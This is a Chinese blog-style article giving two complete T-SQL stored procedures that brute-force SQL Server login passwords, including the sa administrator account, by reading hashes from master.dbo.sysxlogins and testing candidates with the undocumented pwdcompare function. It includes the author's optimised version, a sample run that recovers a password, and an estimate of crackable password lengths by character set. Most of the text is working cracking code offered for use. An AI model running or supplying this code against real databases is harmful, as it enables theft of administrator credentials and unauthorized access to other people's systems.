发布：2022/12/8 15:18:18作者：管理员 来源：本站 浏览次数：447

网上有SQL Server Sa密码破解的存储过程，方法就是暴力破解MSSQL的帐号和密码，包括管理员帐号sa的密码，下面我对其它的代码稍做修改，并进行了一些性能分析。

首先说说破解过程序核心思想，就是存储帐号密码的master.dbo.sysxlogins表和未公布的密码比较存储过程pwdcompare。经过一方分析，修改了部分代码，下面贴出修改前后的代码，

一个SQL Server Sa密码破解的存储过程

代码如下:

alter proc p_GetPassword

   @username sysname=null, --用户名,如果不指定,则列出所有用户

   @pwdlen int=2 --要破解的密码的位数,默认是2位及以下的

as

   set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

   select top 255 id=identity(int,0,1) into #t from syscolumns

   alter table #t add constraint PK_#t primary key(id)

   select name,password

       ,type=case when xstatus&2048=2048 then 1 else 0 end

       ,jm=case when password is null then 1 else 0 end

       ,pwdstr=cast('' as sysname)

       ,pwd=cast('' as varchar(8000))

       into #pwd

   from master.dbo.sysxlogins a

   where srvid is null

       and name=isnull(@username,name)

   declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)

   declare @l int

   select @l=0

       ,@s1='char(aa.id)'

       ,@s2='cast(aa.id as varchar)'

       ,@s3=',#t aa'

   exec('

       update pwd set jm=1,pwdstr='+@s1+'

       ,pwd='+@s2+'

       from #pwd pwd'+@s3+'

       where pwd.jm=0

       and pwdcompare('+@s1+',pwd.password,pwd.type)=1

       ')

   while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)

   begin

       select @l=@l+1

       ,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)'

       ,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)'

       ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)

       exec('

       update pwd set jm=1,pwdstr='+@s1+'

       ,pwd='+@s2+'

       from #pwd pwd'+@s3+'

       where pwd.jm=0

       and pwdcompare('+@s1+',pwd.password,pwd.type)=1

       ')

   end

   select 用户名=name,密码=pwdstr,密码ASCII=pwd

   from #pwd

GO

下面是我修改后的代码：

代码如下:

alter proc p_GetPassword2

   @username sysname=null, --用户名,如果不指定,则列出所有用户

   @pwdlen int=2 --要破解的密码的位数,默认是2位及以下的

as

   set nocount on

if object_id(N'tempdb..#t') is not null

       drop table #t

   if object_id(N'tempdb..#pwd') is not null

       drop table #pwd

set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

declare @ss varchar(256)

   --select @ss= '123456789'

   select @ss=    'abcdefghijklmnopqrstuvwxyz'

   select @ss=@ss+ '`0123456789-=[]\;,./'

   select @ss=@ss+ '~!@#$%^&*()_+{}|:<>?'

   --select @ss=@ss+    'ABCDEFGHIJKLMNOPQRSTUVWXYZ'

create table #t(c char(1) not null)

   alter table #t add constraint PK_#t primary key CLUSTERED (c)

   declare @index int

   select @index=1

   while (@index <=len(@ss))

   begin

       insert #t select SUBSTRING(@ss, @index, 1)

       select @index = @index +1

   end

select name,password

       ,type=case when xstatus&2048=2048 then 1 else 0 end

       ,jm=case when password is null then 1 else 0 end

       ,pwdstr=cast('' as sysname)

       ,pwd=cast('' as varchar(8000))

       ,times =cast('' as varchar(8000))

       into #pwd

   from master.dbo.sysxlogins a

   where srvid is null

       and name=isnull(@username,name)

   declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000), @stimes varchar(8000)

declare @l int, @t bigint

select @t = count(1)*POWER(len(@ss),1) from #pwd

select @l=0

       ,@s1='aa.c'

       ,@s2='cast(ASCII(aa.c) as varchar)'

       ,@s3=',#t aa'

       ,@stimes='1th,' + cast(@t as varchar(20)) + 'rows'

exec('

       update pwd set jm=1,pwdstr='+@s1+'

       ,pwd='+@s2+'

       from #pwd pwd'+@s3+'

       where pwd.jm=0

       and pwdcompare('+@s1+',pwd.password,pwd.type)=1

       ')

   while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)

   begin

       select @l=@l+1

       select @t = count(1)*POWER(len(@ss),@l+1) from #pwd

       print @t

select

       @s1=@s1+'+'+char(@l/26+97)+char(@l%26+97)+'.c'

       ,@s2=@s2+'+'',''+cast(ASCII('+char(@l/26+97)+char(@l%26+97)+'.c) as varchar)'

       ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)

       ,@stimes=@stimes+';'+ cast(@l+1 as varchar(1)) + 'th,' + cast(@t as varchar(20)) + 'rows'

exec('

       update pwd set jm=1,pwdstr='+@s1+'

       ,pwd='+@s2+'

       ,times='''+@stimes+'''

       from #pwd pwd'+@s3+'

       where pwd.jm=0

       and pwdcompare('+@s1+',pwd.password,pwd.type)=1

       ')

   end

   select 用户名=name,密码=pwdstr,密码ASCII=pwd, 查询次数和行数=times

   from #pwd

if object_id(N'tempdb..#t') is not null

       drop table #t

   if object_id(N'tempdb..#pwd') is not null

       drop table #pwd

我测试如下

代码如下:

p_GetPassword2 'b', 6

用户名 密码 密码ASCII 查询次数和行数

b 123 49,50,51 1th,66rows;2th,4356rows;3th,287496rows

性能分析:

本例以一个查询能查询bigint的最大值条记录9223372036854775807为限做为主机最大性能，来粗略计算破解性能。

破解一个帐号的密码长度，破解时间和性能消耗，是以所有用于破解的字符长度为底，以密码长度为指数的指数函数，即：破解帐号个数 * （所有用于破解的字符个数）最长密码长度次方 < 主机最大性能：

原存储过程使用256个破解字符，理论上可以破解7位密码，即2567<Max(bigint)。

我修改的存储过程使用66个键盘常规字符，理论上可以破解10位密码，即6610<Max(bigint)。

如果知道密码是10个数字字符的组合，理论上可以破解19位密码，即1019<Max(bigint)。